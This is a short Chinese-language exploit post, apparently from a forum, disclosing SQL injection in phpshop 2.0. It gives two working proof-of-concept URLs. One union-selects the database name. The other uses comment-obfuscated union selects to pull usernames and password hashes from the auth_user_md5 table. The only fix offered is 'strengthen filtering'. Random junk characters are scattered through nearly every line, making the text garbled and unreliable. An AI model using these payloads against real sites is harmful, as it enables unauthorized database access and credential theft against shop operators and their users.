标题 : phpshop 2.0 SQL Injection Vulnerability
# w. o. y z4 r3 e7 m% D) G k7 C8 V5 d, Z9 P; H8 `
作者 : By onestree6 b, l2 k l/ c7 U" `9 s" l5 D; Q
下载地址 : http://code.google.com/p/phpshop/downloads/list
1 s1 v' m% t4 I* B$ o+ @测试地址: windows 7 / ubuntu
- X) R& j9 _$ ?) T! n . E. ]8 H J& C6 u4 d# o
( b- {! w. N/ B! kSQLi p0c:- x& ?3 J2 F8 d4 w: U3 g& R
; o) P2 q f2 a5 \. q7 V! G! M- h6 U
==================
0 }1 U( ]+ M9 z2 O" R 4 B7 J3 H- S5 @7 y/ S4 u
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
$ R ^3 `0 k( u+ O6 V% v' Nunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
6 S, j! J! K1 F+ v- k' e6 m ! r ~, W: ~& V( s" l
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--) a; [( M0 o- f) i! b
: m/ }7 B% f7 M, h! N& Y修复:+ C7 i+ D2 X* p! E; ]- [
加强过滤8 f4 J& M8 z2 @9 L
) y' y( P4 j# d8 z
& R$ R7 `. V& U G$ y2 B! E
|